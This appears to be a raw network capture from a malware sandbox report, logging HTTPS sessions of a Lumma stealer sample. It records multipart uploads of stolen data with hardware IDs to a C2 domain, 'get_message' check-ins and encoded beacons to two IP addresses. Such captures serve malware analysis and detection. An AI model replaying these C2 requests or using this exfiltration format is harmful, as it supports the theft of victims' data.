                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:36 UTC1122OUTData Raw: 59 6d 64 32 71 31 51 47 64 36 64 4e 69 69 50 4b 5a 62 4d 62 63 79 4a 4b 33 53 37 71 70 70 71 53 33 51 79 6c 44 31 46 2b 78 4a 61 53 32 63 6e 72 35 75 64 46 32 45 5a 63 73 48 46 77 37 62 52 64 4e 59 78 39 6c 32 56 75 73 77 30 30 73 67 67 41 47 78 65 49 79 72 35 37 49 41 6b 52 73 64 6e 4e 65 67 45 37 62 45 55 73 44 39 6e 6e 52 73 7a 63 68 74 56 2b 4c 6b 34 54 37 34 31 67 53 77 6c 59 70 75 4d 79 58 72 55 49 35 56 4a 68 30 4c 44 48 73 68 62 37 62 4f 73 7a 68 49 49 6b 49 69 73 73 35 5a 49 41 44 7a 33 41 48 58 52 71 55 64 74 42 41 45 63 34 33 51 4a 48 58 77 50 78 43 59 47 49 2f 6d 47 7a 42 34 46 47 4b 41 69 69 44 64 6c 62 70 74 72 54 4b 37 56 58 31 41 41 64 6f 76 38 32 78 45 54 33 77 35 75 30 41 75 30 56 30 54 4f 6e 6d 34 6f 67 42 37 68 2f 50 54 67 4e 51 6a 30
                                                                                    Data Ascii: Ymd2q1QGd6dNiiPKZbMbcyJK3S7qppqS3QylD1F+xJaS2cnr5udF2EZcsHFw7bRdNYx9l2Vusw00sggAGxeIyr57IAkRsdnNegE7bEUsD9nnRszchtV+Lk4T741gSwlYpuMyXrUI5VJh0LDHshb7bOszhIIkIiss5ZIADz3AHXRqUdtBAEc43QJHXwPxCYGI/mGzB4FGKAiiDdlbptrTK7VX1AAdov82xET3w5u0Au0V0TOnm4ogB7h/PTgNQj0
                                                                                    2024-07-24 17:57:37 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:37 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:37 UTC685INData Raw: 41 68 2f 61 6f 38 43 68 67 76 73 36 34 56 4b 2f 68 57 53 55 46 44 4e 66 34 45 32 74 67 53 49 4d 71 4c 33 67 7a 6c 32 4a 70 4c 31 6d 6b 65 6d 5a 63 42 48 45 64 59 39 6a 4a 67 6a 64 79 31 49 71 50 46 53 31 34 31 31 53 48 35 75 31 39 55 68 6a 68 54 4b 42 69 43 55 51 47 50 37 6f 71 76 79 32 37 6f 64 38 52 56 67 4f 6e 32 43 46 2b 43 41 6e 51 73 30 75 74 78 6b 6e 7a 4e 4a 4c 59 7a 63 51 39 76 58 61 54 6d 4b 48 75 4f 6b 33 41 38 51 51 5a 2b 7a 72 4b 68 42 71 38 36 65 48 49 71 37 66 44 4b 46 68 68 59 78 42 47 66 52 33 4a 65 37 4f 71 79 34 6b 31 6d 45 77 37 56 79 33 65 46 76 44 62 79 54 72 7a 6b 36 49 6c 2b 68 6f 67 57 38 6f 6d 6c 52 34 41 73 58 6c 65 51 41 32 33 45 55 61 46 62 48 49 46 47 68 53 32 59 4e 72 33 51 61 59 42 32 2b 51 48 57 4e 68 50 44 54 2f 43 50 79
                                                                                    Data Ascii: Ah/ao8Chgvs64VK/hWSUFDNf4E2tgSIMqL3gzl2JpL1mkemZcBHEdY9jJgjdy1IqPFS1411SH5u19UhjhTKBiCUQGP7oqvy27od8RVgOn2CF+CAnQs0utxknzNJLYzcQ9vXaTmKHuOk3A8QQZ+zrKhBq86eHIq7fDKFhhYxBGfR3Je7Oqy4k1mEw7Vy3eFvDbyTrzk6Il+hogW8omlR4AsXleQA23EUaFbHIFGhS2YNr3QaYB2+QHWNhPDT/CPy


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.1049797172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:36 UTC288OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 531309
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: 3b 61 8d 04 93 7e 17 2c e4 c7 ea bf 54 9b 38 b6 ad da 94 ca 0d 46 8e 75 9a 81 ec 38 32 0f 5e b3 4d 49 5d ca 74 54 de c6 4f e7 0e 2b d1 19 f6 e9 be 9d fd e8 66 2b 7b 60 ae bd af 56 b1 79 ca 92 7c e3 9c 36 61 9d 14 8b 3f da 30 6e 9b ec 6c de 1b 6a 98 82 8d 0a b4 d2 10 7a 59 27 e7 ff 5b f4 f6 8d d4 34 b1 20 8a cc a5 11 f7 ad 67 fb 70 39 f9 ca 7b 20 59 1d 8c 34 7c cd 51 a7 c0 bd 01 d0 da c1 20 77 b8 d4 0d 5a 8f 08 68 7d e1 00 48 43 c1 de 58 46 da 00 b5 02 0f ab 62 d8 7c a7 61 95 b9 bb 73 dd df 16 3f 2c 1c 9d 03 23 d1 4a d5 e2 d6 f0 5c f7 07 8f b6 aa 8f fd ba 9f 56 be 19 40 b4 59 99 bb fc da 98 00 7d 88 36 84 63 9f 25 80 c1 21 c5 ba 14 54 c3 6c 71 6c 97 c7 50 09 29 b9 a7 b6 a2 d9 6a 00 2c 3f 77 e5 bb 52 e6 e7 6c f1 c4 ba f8 b5 e2 95 eb e6 f1 c1 de 2e 1f fe b7
                                                                                    Data Ascii: ;a~,T8Fu82^MI]tTO+f+{`Vy|6a?0nljzY'[4 gp9{ Y4|Q wZh}HCXFb|as?,#J\V@Y}6c%!TlqlP)j,?wRl.
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: dd 44 dd 88 d6 75 e9 fc 74 30 96 fb e8 96 83 bb f1 08 97 13 2a 55 2e ae cb 41 37 5c cb ed 62 a9 ac ff 6a 1d b5 c1 6a 69 c5 c3 a3 ce 56 da 3d 3e 9f 08 1e e5 d2 10 c4 2d 82 29 cd d4 4e 20 c6 c7 91 4f fb 5e db f7 92 af 36 59 c9 29 25 ac ec 65 42 68 59 70 b7 a8 93 23 47 5e 96 f7 f6 29 6a 14 a6 5e 34 db 03 db d1 17 8c c4 9c c1 c4 bd 75 98 07 7e 02 ce 3e 38 41 fb 58 71 b3 00 db 73 a7 09 7c 10 ee 71 d8 41 47 be 4a 8c 5b d4 0c ea 8d bb ac 5c 1e d7 5c 69 a3 17 4a 93 67 ba 34 91 21 b2 b5 a2 a9 3b 25 fb 47 88 fc 70 98 9a 74 41 9c 93 b2 3c 29 25 3c 00 9f b7 6d 5b 47 2e 67 16 ed 26 f6 24 ff cc 8a d3 97 9e 99 e7 39 5e 53 cf 4a db c0 70 aa 64 34 d4 b2 97 e8 33 a3 92 75 be 1c 79 76 db 4c fb 35 83 f2 3c 46 fa ed 51 d9 d4 3c 59 e5 fd 03 f1 1e 83 61 f9 0f 14 d2 46 3d 58 bc
                                                                                    Data Ascii: Dut0*U.A7\bjjiV=>-)N O^6Y)%eBhYp#G^)j^4u~>8AXqs|qAGJ[\\iJg4!;%GptA<)%<m[G.g&$9^SJpd43uyvL5<FQ<YaF=X
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: a2 0e e2 b9 0a a0 8b a5 51 65 5b 2f 7f ee 9a 4d a4 d5 87 e1 c4 61 27 c7 6e 0f 35 8b 3e 19 f2 be 71 7e e9 93 ff bb c9 33 f4 c1 c1 0b 3f 43 34 c9 ba 6a e8 29 ba 19 8e e2 fa 18 81 c8 1b bd 2f 60 f8 91 f8 40 5c 29 10 43 d8 77 22 78 b0 e5 6d 6b 65 da ed 9a 9b 3a 5f 80 95 2b 5e 33 1f fa c8 53 3b ab 7c 39 cd f0 8b 4c 2e fb ea 1d 02 2f e5 de fd d6 c4 b0 4c 36 7b ee e9 54 18 af 24 19 f8 cf e7 99 4f 51 17 78 0d ad bb bb 66 26 18 42 42 61 16 58 e2 61 5a 1e 2b 6d 4a 97 03 c4 d0 87 68 5c b4 a9 df 15 b4 10 47 fa fb 52 3d be d0 ba e9 cc 3b 6f e5 d4 ae ad 07 1d c4 89 7d 7a 97 7f 22 80 c5 0c 6e 09 66 ae 90 54 d4 b3 7c 87 fe d2 55 93 09 a0 15 4a 8a 8e 95 3e 0b c9 c7 5a 0c cb 58 87 9b 3a 00 bf ce 65 3a ea 66 cc 3d 38 40 90 fe 04 54 cf ea ac 8f 36 3a ad 5a c2 ba 67 e0 61 69
                                                                                    Data Ascii: Qe[/Ma'n5>q~3?C4j)/`@\)Cw"xmke:_+^3S;|9L./L6{T$OQxf&BBaXaZ+mJh\GR=;o}z"nfT|UJ>ZX:e:f=8@T6:Zgai
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: 3b 6e 0a 61 31 74 62 b0 c1 9f a0 0d cd 68 23 3f 23 43 59 fb f4 62 c8 65 b6 1b 71 27 3c ba de bb ef fb 90 04 22 99 db c8 29 55 61 9d de 44 6e 86 f6 8b 76 34 ce af 6e 06 c0 5e 25 77 fa 9f 27 c4 d3 78 77 30 61 5e 8c df 23 bc 95 aa 47 2f d6 9c 96 9e ed ba 4c 33 a4 0b df e9 2c 42 aa f5 69 6c 40 e0 c1 9e d1 1c 1d 4d 92 e9 46 e1 94 c8 65 55 99 dc 68 de f6 3f 86 4e fb 9a 21 b5 eb 44 d1 fb 22 7a 89 ed 0d f5 b6 9c 2b 60 1b bf 23 ba 71 eb 94 a8 32 ab 50 14 73 99 d8 58 f0 94 b8 29 b1 4f 84 7e 13 17 3c 07 8a 5a 83 11 8c 82 03 e5 5b 5b a5 3c df de 1e 1a 61 a5 a4 3c f2 ae 79 8f 64 67 06 17 97 86 45 51 1a 87 86 97 e5 b8 71 47 92 42 34 34 95 22 a8 d3 3c 5e f4 7b f3 83 91 f8 ea f1 79 9f 7d f8 2b ff 8f e2 69 8a a2 fe 3f 4b 66 00 1a 7e 7a ef 80 38 2f 30 72 56 95 06 f9 03 7f
                                                                                    Data Ascii: ;na1tbh#?#CYbeq'<")UaDnv4n^%w'xw0a^#G/L3,Bil@MFeUh?N!D"z+`#q2PsX)O~<Z[[<a<ydgEQqGB44"<^{y}+i?Kf~z8/0rV
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: f7 3c a0 3c 02 36 c3 82 c8 7d b4 5a 0c b0 0a 6a 48 c9 a3 aa 66 b7 aa 1e 1b 0a 1a f8 a1 93 7d c7 bc 4a 87 00 b2 4c f3 5e 35 ba 1f e4 90 3f 20 9b 0c c8 47 79 41 f1 23 8c 6f 1f 47 ff b9 ce bc 7b 1e 1f 18 ba 4e c0 54 d7 f6 d0 42 21 2a 04 41 9e b4 bc e5 a7 13 c9 ae 18 0b 88 ee 57 0c 26 20 32 27 03 bf 75 5d 28 90 30 6b e9 9b 9a 2b a2 5b e3 e3 b4 1b b1 af 7a 7e 22 70 7c ea 60 23 02 90 cb a0 4e f6 ac bb e4 ba 07 fa 09 2d f5 54 fd b4 d6 9f 20 16 4a c1 06 70 60 d9 99 ab 83 7a e4 12 4c 29 4f 37 22 7a 09 49 f0 5d 45 24 7e 58 10 62 5a 82 c6 ac 7b 07 cb 5e dd a9 ff 63 a2 61 9e 96 72 09 38 a7 7e 74 69 7d 06 13 f6 ee 96 4b b7 84 41 48 27 6f 9e e7 84 05 33 64 dc 0e df d2 ee 50 12 75 9a ce 07 79 71 ac e5 1b 7c 91 21 4b 4b 52 fb 6b 55 30 58 21 cc af a9 86 48 fb ca f3 59 16
                                                                                    Data Ascii: <<6}ZjHf}JL^5? GyA#oG{NTB!*AW& 2'u](0k+[z~"p|`#N-T Jp`zL)O7"zI]E$~XbZ{^car8~ti}KAH'o3dPuyq|!KKRkU0X!HY
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: 2f ca 29 c8 90 5e 81 ec 3c 22 ea 3e 88 0e 13 4f 6b dd 51 de 7b ed b3 fa 9e e4 61 2b 17 a6 8b e8 3c 95 fd b7 62 a2 78 d8 4d e5 82 40 81 d3 bf d0 48 0b fa 46 82 e1 5c e3 00 a5 44 f4 e4 29 db 74 53 b3 93 31 ee 33 b9 01 44 41 48 d0 16 e8 03 93 d8 02 c1 e0 bb 6a d4 0c a9 70 3f ec e5 ae 01 0a 8e a8 1c 76 19 a5 b9 0a 10 c2 43 71 2e f6 6a f7 3d c4 4e fc 07 ef 7f 57 2f 7d 49 e7 f8 d8 2f 38 52 ac bf 13 76 d3 91 b2 93 f7 3c 8a 79 83 de 6d 72 b3 fd 8b c7 db 88 1f 0f 45 0d 6f b7 da 8e a7 69 c3 d7 47 b1 d6 b8 c4 04 2f 33 22 81 4a 2c e3 e3 85 9b 09 73 2d d7 92 d9 c8 19 0c 28 16 b0 cb ac 15 c8 22 21 96 7c 9a d2 22 6a ac 79 79 53 20 da f1 c3 2b 09 d0 79 58 ba fe ce d1 c3 dd 57 b8 7f 68 94 b5 b5 6b 5d 8d 94 1d d6 c2 0e 5b 9f 54 50 c2 53 a8 d8 9f da 69 57 e0 cf 5e 35 d2 df
                                                                                    Data Ascii: /)^<">OkQ{a+<bxM@HF\D)tS13DAHjp?vCq.j=NW/}I/8Rv<ymrEoiG/3"J,s-("!|"jyyS +yXWhk][TPSiW^5
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: d7 5c b9 c3 4b 18 ba 01 48 93 32 ea 02 30 ee a1 12 e0 c7 bc 60 d4 1c 56 a9 07 7a 16 6d fd 09 e1 a6 9d 77 4f 15 92 ef 05 bc 93 77 fe 56 81 3c ae 83 9b 68 25 d2 04 64 e3 88 05 27 be 6b 88 3e 6c fc e3 89 06 81 3c 42 c7 15 9c d9 e8 33 a5 aa 89 81 1b 0c 2a 8a 59 7c 48 ff 36 06 04 a3 21 10 82 dd d6 1f f9 ae 05 6f c7 20 87 b1 80 94 a5 94 78 1e 14 48 08 f0 03 c2 3a 91 17 c4 a7 32 57 8a 60 d4 0f d9 02 70 9a f5 9e 0e 8c 28 24 e4 db 46 d5 86 7b b8 81 3b 82 e9 5c 12 0f eb 59 74 83 e1 a3 dc f5 f7 72 11 38 f7 32 5b 14 fb f0 c2 85 17 a4 d7 f1 15 39 02 e0 20 63 ec 49 e0 f4 64 d5 1f 12 05 2a 3b df e1 38 14 e4 07 fb b1 19 53 3c 98 a1 13 ed df 18 c6 bb 3b 8b dc bf a1 0c 90 b8 64 c3 3d 1a 1d 8e 5c 40 14 28 e3 72 5f c1 2c 19 ce 7f 0d 5b a0 15 c7 9e 0e 86 bf 5b 88 f4 e5 e1 65
                                                                                    Data Ascii: \KH20`VzmwOwV<h%d'k>l<B3*Y|H6!o xH:2W`p($F{;\Ytr82[9 cId*;8S<;d=\@(r_,[[e
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: bc 48 24 73 e3 83 35 1e 53 9e d2 01 e9 1b 93 66 d6 3f d0 c8 ee fe 2a 4c 3a 41 cb f9 1f bb 27 cc 2f 38 02 93 23 30 8e ad 4c af f4 6c f0 16 59 16 17 09 eb da 5f fc f8 01 06 0e 54 c1 2f 23 27 de cc 94 cd 7e 64 6c 23 82 b4 eb 27 18 e9 bd 51 47 92 e4 d9 b9 2d 5b 4d 8a 9e 45 58 69 66 79 f8 ae cc ec 6b 74 3f 8a 46 4d ec f7 18 3d 64 d4 1a ff c6 b1 08 b7 f7 6e ea 54 5d cb 5f f5 c5 57 dd 8a db 22 f8 79 9e 7e ac 32 0c 43 f6 f1 07 cd 3d 93 33 98 8d 5a 8f 3f c1 0c 6f f2 4c ed 40 60 41 c8 70 45 ee 88 eb 5a fe c8 ad a1 2e 5e 49 6c c8 d2 37 8b 32 73 af 74 9f 88 29 53 93 df 5d b6 ad 57 3b b7 b7 5d 6b d8 de 16 d7 3e bd 98 23 c3 f2 59 f5 46 8c 7e 08 f4 28 3e 99 42 a0 2e c4 6f bc f3 0b 50 0f 4f 9c 20 29 7c 5b 92 80 98 b3 81 69 96 24 42 7e fa b2 8d ad d3 87 da 9c c8 f1 9c ff
                                                                                    Data Ascii: H$s5Sf?*L:A'/8#0LlY_T/#'~dl#'QG-[MEXifykt?FM=dnT]_W"y~2C=3Z?oL@`ApEZ.^Il72st)S]W;]k>#YF~(>B.oPO )|[i$B~
                                                                                    2024-07-24 17:57:36 UTC15331OUTData Raw: 7d ef 57 88 75 00 59 ff 40 24 5a 68 46 83 91 cc 06 09 61 52 24 02 b8 e8 c8 78 c9 e3 91 35 97 fb 76 be 6b 0f 22 81 fd e3 5f 65 5c 5d e6 af fd bd 1a 30 f3 91 b1 6d 36 9e b9 db 48 f1 5e 3a 5d d3 cc 3c ca 9e 39 6c 6a 84 91 23 b4 0b 16 2e 65 0b bc 57 4f 4c 88 1b 34 db c4 af e3 f4 9c a3 64 a9 ee 16 66 e0 51 0f f7 ef 28 ef 38 53 58 71 e3 4c 4d e8 1d e1 e2 30 6c 10 ea 67 8e 43 8e bc ba fc f1 a0 e1 c0 1f 4f d6 17 bf fa a8 fa e1 9f 35 9b 91 56 ad 12 36 87 9a c6 da 36 bc 23 f4 31 34 37 5d bb 60 b9 e1 c0 bd b3 22 11 2b 9f 64 37 4f 3f db 79 5a e8 8f e5 4a a0 2a 4b 76 cf b9 80 1a 4a 91 ec 40 ba 3d de 19 bd 62 c9 b6 b1 0d be c5 09 f9 71 23 49 52 5f 5c 50 d1 02 8e e2 b1 71 29 51 8c 27 d2 22 cb e2 6b 93 ea 19 c7 77 47 a9 c8 3d fe d6 f6 32 64 12 b9 fe de ef ba 06 34 56 98
                                                                                    Data Ascii: }WuY@$ZhFaR$x5vk"_e\]0m6H^:]<9lj#.eWOL4dfQ(8SXqLM0lgCO5V66#147]`"+d7O?yZJ*KvJ@=bq#IR_\Pq)Q'"kwG=2d4V
                                                                                    2024-07-24 17:57:39 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=f9ufgqnova3qklijk8i66ab21p; expires=Sun, 17-Nov-2024 11:44:17 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3k162Tj63Logggyb9yI73wb6lCowJCT4ptc8IlHCz8gSl1vuNRjverMhoGLd44DA9VYj9Bh7H2%2BgUUdJMihzLrhJQRHX84MODWS0fhXgi17CqSH%2F5ie5vM6KHP%2Bi5cdgMmDOw%2FuFlKQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cb2a1f634414-EWR
                                                                                    alt-svc: h3=":443"; ma=86400


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.2.1049798107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:38 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:38 UTC1122OUTData Raw: 50 44 51 72 6a 79 69 6b 4d 47 49 62 45 2b 71 55 38 62 44 66 65 78 37 58 70 4d 38 6b 63 59 63 43 6f 45 34 43 6d 44 75 54 6e 48 54 67 50 7a 33 63 57 79 31 66 69 79 6e 47 57 50 51 49 41 6a 4f 31 4d 4f 6d 4b 35 32 63 4c 30 67 53 61 72 47 4a 65 52 79 6a 71 68 63 76 55 59 36 47 68 74 36 2b 53 4f 56 49 32 55 71 43 79 73 2b 50 33 55 63 73 32 48 65 53 76 5a 4d 56 34 44 50 6e 34 74 6f 30 76 41 2b 73 53 4f 69 68 70 67 69 50 6d 68 67 2f 57 36 31 6e 4e 57 36 78 31 30 6c 72 2b 4f 50 2b 51 6b 38 55 34 72 72 34 6e 47 71 70 74 4b 78 77 75 38 42 41 4a 6a 70 32 43 6f 4f 6e 4c 2b 6e 49 41 79 51 38 63 47 36 69 4f 4b 4e 53 71 2f 2f 43 41 50 58 72 36 75 6d 69 6a 47 6b 31 45 51 6a 75 49 74 6c 79 6d 34 50 49 59 79 2f 34 54 6e 64 31 6c 72 2b 4d 2f 36 54 6e 37 61 67 79 34 38 70 77
                                                                                    Data Ascii: PDQrjyikMGIbE+qU8bDfex7XpM8kcYcCoE4CmDuTnHTgPz3cWy1fiynGWPQIAjO1MOmK52cL0gSarGJeRyjqhcvUY6Ght6+SOVI2UqCys+P3Ucs2HeSvZMV4DPn4to0vA+sSOihpgiPmhg/W61nNW6x10lr+OP+Qk8U4rr4nGqptKxwu8BAJjp2CoOnL+nIAyQ8cG6iOKNSq//CAPXr6umijGk1EQjuItlym4PIYy/4Tnd1lr+M/6Tn7agy48pw
                                                                                    2024-07-24 17:57:39 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:39 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:39 UTC685INData Raw: 47 41 58 56 49 74 79 5a 47 42 74 47 59 6f 78 58 78 53 6e 50 75 7a 64 47 4e 46 61 48 31 4f 62 71 2b 32 74 5a 72 38 59 4f 31 58 33 78 72 74 62 6a 4d 58 6a 45 63 43 72 33 4a 6e 42 71 61 32 6d 61 55 6e 43 79 43 38 78 34 4c 63 71 61 33 6a 66 41 39 63 65 42 6f 47 51 38 77 57 4a 6d 59 44 32 32 53 6b 41 39 55 4d 75 4b 2b 74 4b 4e 68 43 57 30 42 4b 36 6b 39 30 64 67 65 62 41 62 42 7a 6e 57 56 32 7a 36 45 66 66 48 79 75 32 30 4c 36 79 69 65 30 4a 58 36 4b 44 68 6b 7a 30 32 59 51 72 7a 41 2f 34 41 5a 72 6d 31 6b 6b 78 41 2b 35 36 4b 72 2f 55 68 4d 66 74 36 35 6a 46 46 7a 63 41 71 59 6f 76 5a 69 36 6c 61 36 57 76 76 4d 4f 33 6d 7a 61 56 6f 41 44 79 4b 71 39 45 4d 46 48 52 4b 59 66 4d 37 54 54 59 6d 61 62 7a 57 4f 34 6c 66 78 7a 72 47 54 4f 39 4f 69 73 52 61 77 36 61
                                                                                    Data Ascii: GAXVItyZGBtGYoxXxSnPuzdGNFaH1Obq+2tZr8YO1X3xrtbjMXjEcCr3JnBqa2maUnCyC8x4Lcqa3jfA9ceBoGQ8wWJmYD22SkA9UMuK+tKNhCW0BK6k90dgebAbBznWV2z6EffHyu20L6yie0JX6KDhkz02YQrzA/4AZrm1kkxA+56Kr/UhMft65jFFzcAqYovZi6la6WvvMO3mzaVoADyKq9EMFHRKYfM7TTYmabzWO4lfxzrGTO9OisRaw6a


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.2.1049800172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:40 UTC269OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 77
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:40 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=qToYrJ--&j=&hwid=8F2C114769E59A360D3FAAA1B508DF78
                                                                                    2024-07-24 17:57:40 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=m4bdqv7oi7ltp5goq6jngfthnd; expires=Sun, 17-Nov-2024 11:44:19 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mtye6lA7dROdoMRxPX15Mv%2F7Rd5O%2B%2FFXwSX5uys6bGVEUdtH9LqqXHwSDXy3ksCPiiw8WngnYT1BlLgb00bBH32aek7wkBkX7Pwrb6bMNDLn%2FmegG66zj80oyKbttZaRxMOIsICPUz0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cb3e3ff919ae-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:40 UTC54INData Raw: 33 30 0d 0a 68 42 45 44 68 46 35 71 4d 65 66 77 49 51 56 44 65 6b 6d 6c 4e 63 34 57 41 57 62 72 30 64 74 67 54 58 56 35 5a 61 72 39 59 77 37 66 54 41 3d 3d 0d 0a
                                                                                    Data Ascii: 30hBEDhF5qMefwIQVDekmlNc4WAWbr0dtgTXV5Zar9Yw7fTA==
                                                                                    2024-07-24 17:57:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.2.1049801107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:40 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
